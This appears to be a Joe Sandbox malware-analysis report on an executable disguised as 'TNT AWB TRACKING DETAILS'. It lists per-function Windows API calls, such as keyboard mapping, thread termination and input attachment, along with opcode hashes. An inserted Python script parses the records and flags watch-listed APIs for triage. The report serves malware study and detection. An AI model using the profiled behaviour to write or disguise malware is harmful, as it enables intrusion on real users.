                                      • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                      • String ID:
                                      • API String ID: 3275902921-0
                                      • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                      • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                      • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                      • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                      APIs
                                      • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                      • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                      • String ID:
                                      • API String ID: 2833360925-0
                                      • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                      • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                      • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                      • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                      APIs
                                      • SendMessageW.USER32 ref: 004555C7
                                      • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                      • DeleteObject.GDI32(?), ref: 00455736
                                      • DeleteObject.GDI32(?), ref: 00455744
                                      • DestroyIcon.USER32(?), ref: 00455752
                                      • DestroyWindow.USER32(?), ref: 00455760
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                      • String ID:
                                      • API String ID: 3691411573-0
                                      • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                      • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                      • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                      • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                      APIs
                                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                      • LineTo.GDI32(?,?,?), ref: 004472AC
                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                      • LineTo.GDI32(?,?,?), ref: 004472C6
                                      • EndPath.GDI32(?), ref: 004472D6
                                      • StrokePath.GDI32(?), ref: 004472E4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                      • String ID:
                                      • API String ID: 372113273-0
                                      • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                      • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                      • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                      • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                      APIs
                                      • GetDC.USER32(00000000), ref: 0044CC6D
                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                      • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CapsDevice$Release
                                      • String ID:
                                      • API String ID: 1035833867-0
                                      • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                      • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                      • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                      • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                      APIs
                                      • __getptd.LIBCMT ref: 0041708E
                                        • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                        • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                      • __amsg_exit.LIBCMT ref: 004170AE
                                      • __lock.LIBCMT ref: 004170BE
                                      • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                      • _free.LIBCMT ref: 004170EE
                                      • InterlockedIncrement.KERNEL32(030D2CD8), ref: 00417106
                                      Similarity
                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                      • String ID:
                                      • API String ID: 3470314060-0
                                      • Opcode ID: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                      • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                      • Opcode Fuzzy Hash: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                      • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                      APIs
                                      • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                      • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                      • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                        • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                      Similarity
                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                      • String ID:
                                      • API String ID: 3495660284-0
                                      • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                      • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                      • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                      • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                      APIs
                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                      Similarity
                                      • API ID: Virtual
                                      • String ID:
                                      • API String ID: 4278518827-0
                                      • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                      • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                      • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                      • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
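The function records above (the TerminateThread/WaitForSingleObject function and the six MapVirtualKeyW calls) follow the same "APIs" / "Similarity" layout as every other record in this report, so they can be parsed and queried rather than read by eye. The script below is an added example, not Joe Sandbox tooling and not code from the sample: SAMPLE is copied verbatim from those two records on this page, VK_NAMES are the winuser.h virtual-key constants, and WATCH_LIST is an assumed triage list, not a verdict the report itself states.

```python
"""Parse the per-function 'APIs' / 'Similarity' records of this Joe Sandbox report
so that each function's Win32 API mix can be queried rather than read by eye.
Added example, not Joe Sandbox tooling. SAMPLE is copied from two records on this
page; VK_NAMES are winuser.h constants; WATCH_LIST is an assumed triage list."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

SAMPLE = """\
APIs
• InterlockedExchange.KERNEL32(?,?), ref: 0044B655
• EnterCriticalSection.KERNEL32(?), ref: 0044B666
• TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
• WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
  • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
• InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
• LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
Similarity
• Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
• Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
• MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
• MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
Similarity
• Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
• Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}
# "• Api.MODULE(args), ref: 0040ABCD"; the argument list may be absent, and the
# indented "Part of subcall function" lines belong to a callee, not this function.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>[A-Za-z_@0-9]+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]{8})\s*$")
KV_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+(?:ID|Hash)):\s*(?P<val>.*)$")
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
            0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}
WATCH_LIST = frozenset({"TerminateThread", "AttachThreadInput", "MapVirtualKeyW"})  # assumed


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: int                # call-site address
    subcall_of: int | None  # callee address for "Part of subcall" lines, else None


@dataclass
class FunctionRecord:
    calls: list[ApiCall] = field(default_factory=list)
    meta: dict[str, str] = field(default_factory=dict)

    @property
    def opcode_id(self) -> str:
        return self.meta.get("Opcode ID", "")

    def api_names(self, include_subcalls: bool = False) -> list[str]:
        return sorted({c.api for c in self.calls if include_subcalls or c.subcall_of is None})


def parse_records(text: str) -> list[FunctionRecord]:
    records: list[FunctionRecord] = []
    section = cur = None
    for line in text.splitlines():
        head = line.strip()
        if head in SECTION_HEADERS:
            # "APIs" always opens a record; a function with no API calls starts at
            # "Strings", so any header after a finished record opens one too.
            if head == "APIs" or cur is None or "Instruction Fuzzy Hash" in cur.meta:
                cur = FunctionRecord()
                records.append(cur)
            section = head
        elif cur is None:
            continue
        elif section == "APIs" and (m := API_RE.match(line)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16),
                                     int(m["sub"], 16) if m["sub"] else None))
        elif section == "Similarity" and (m := KV_RE.match(line)):
            cur.meta[m["key"]] = m["val"].strip()
    return records


def decode_virtual_keys(record: FunctionRecord) -> list[str]:
    """Name the virtual-key code passed as first argument to each MapVirtualKeyW call."""
    codes = [int(c.args[0], 16) for c in record.calls
             if c.api == "MapVirtualKeyW" and c.args and c.args[0] != "?"]
    return [VK_NAMES.get(code, f"VK_0x{code:02X}") for code in codes]


def flag_records(records: list[FunctionRecord]) -> dict[str, list[str]]:
    """Opcode ID -> watch-listed APIs reached directly or through a subcall."""
    return {r.opcode_id: hits for r in records
            if (hits := sorted(set(r.api_names(True)) & WATCH_LIST))}
```

Run against the two records, decode_virtual_keys resolves the six MapVirtualKeyW arguments to VK_LWIN, VK_SHIFT, VK_LSHIFT, VK_RSHIFT, VK_CONTROL and VK_MENU (the modifier keys), and flag_records keys each hit by Opcode ID so it can be matched back to the report; feeding it the whole "APIs" section of this page instead of SAMPLE needs no changes.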
                                      APIs
                                      • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                      • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                      • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                      • ExitThread.KERNEL32 ref: 004151ED
                                      • __freefls@4.LIBCMT ref: 00415209
                                      Similarity
                                      • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                      • String ID:
                                      • API String ID: 442100245-0
                                      • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                      • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                      • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                      • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                      APIs
                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                      • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                      • _wcslen.LIBCMT ref: 0045F94A
                                      • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                      Strings
                                      Similarity
                                      • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                      • String ID: 0
                                      • API String ID: 621800784-4108050209
                                      • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                      • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                      • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                      • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                      APIs
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • SetErrorMode.KERNEL32 ref: 004781CE
                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                      • SetErrorMode.KERNEL32(?), ref: 00478270
                                      • SetErrorMode.KERNEL32(?), ref: 00478340
                                      Strings
                                      Similarity
                                      • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                      • String ID: \VH
                                      • API String ID: 3884216118-234962358
                                      • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                      • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                      • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                      • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                      APIs
                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                      • IsMenu.USER32(?), ref: 0044854D
                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                      • DrawMenuBar.USER32 ref: 004485AF
                                      Strings
                                      Similarity
                                      • API ID: Menu$Item$DrawInfoInsert
                                      • String ID: 0
                                      • API String ID: 3076010158-4108050209
                                      • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                      • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                      • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                      • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                      APIs
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                      • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                      Strings
                                      Similarity
                                      • API ID: MessageSend$_memmove_wcslen
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 1589278365-1403004172
                                      • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                      • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                      • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                      • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: Handle
                                      • String ID: nul
                                      • API String ID: 2519475695-2873401336
                                      • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                      • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                      • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                      • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                      Strings
                                      Similarity
                                      • API ID: Handle
                                      • String ID: nul
                                      • API String ID: 2519475695-2873401336
                                      • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                      • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                      • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                      • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                      Strings
                                      Similarity
                                      • API ID:
                                      • String ID: SysAnimate32
                                      • API String ID: 0-1011021900
                                      • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                      • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                      • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                      • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                      APIs
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                        • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                        • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                        • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                        • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                      • GetFocus.USER32 ref: 0046157B
                                        • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                        • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                      • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                      • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                      • __swprintf.LIBCMT ref: 00461608
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                      • String ID: %s%d
                                      • API String ID: 2645982514-1110647743
                                      • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                      • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                      • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                      • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                      • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                      • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                      • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                      APIs
                                      • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                      • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
